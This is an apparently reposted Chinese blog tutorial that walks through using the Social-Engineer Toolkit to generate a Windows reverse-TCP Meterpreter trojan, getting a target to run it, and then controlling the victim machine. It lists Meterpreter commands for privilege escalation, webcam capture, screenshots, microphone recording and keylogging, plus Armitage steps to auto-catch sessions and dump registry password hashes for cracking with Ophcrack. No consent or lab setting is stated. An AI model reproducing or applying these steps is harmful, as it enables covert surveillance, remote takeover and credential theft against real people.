[可行]setoolkit生成木马软件远程控制实例


查看原文

  1. 选1,social-ensineering attacks
  2. 选4,create a payload and listener
  3. 选2,Windows Reverse_TCP Meterpreter
  4. LHOST 192.168.1.92
  5. PORT 443
  6. 得到~/.set/payload.exe

想办法让目标运行payload

  1. 回车开始监控。
  2. meterpreter得到,可以使用以下命令,对目标机攻击,如果会话被关闭可以使用sessions命令查看当前可连接的会话,并用sessions -i 会话ID进行连接,使用quit命令可退出Meterpreter。

getsystem 获取系统权限

webcam_snap 尝试开启摄像头,下图提示目标没有摄像头设备。

screenshot 获取目标屏幕截屏,如下图已经保存在了/usr/share/set下。

record_mic -d 10 录制10秒钟声音

keyscan_start 开启键盘记录

keyscan_dump 查看键盘记录到的内容

armitage可以设置自动上线监控

  1. 打开Armitage依次点击菜单中的Armitage--Listeners--Set LHOST,填写本机IP地址。
  2. 然后选择Reverse(wait for)设置端口和类型。这里我们填写443端口和Meterpreter类型。
  3. 配置好后点击Start Listener开始监听,此时msf会自动配置exploit模块。
  4. 此时目标主机开机并运行我们的Payload文件时,目标会自动出现在Armitage控制台界面内并被开启Meterpreter会话。
  5. 获取目标主机开机密码
    如果想获得目标主机开机密码,我们可以通过抓取Hash值的方法进行破解,步骤如下:
    在目标上右键依次点击Meterpreter--Access--Dump Hashes--registry method
    [可行]setoolkit生成木马软件远程控制实例_第1张图片

[可行]setoolkit生成木马软件远程控制实例_第2张图片
可以使用Ophcrack这类软件导入Hash值进行破解。

在目标上右键依次点击Meterpreter--Access--Dump Hashes--registry method

转载于:https://www.cnblogs.com/itholidaycn/p/6391389.html

你可能感兴趣的:([可行]setoolkit生成木马软件远程控制实例)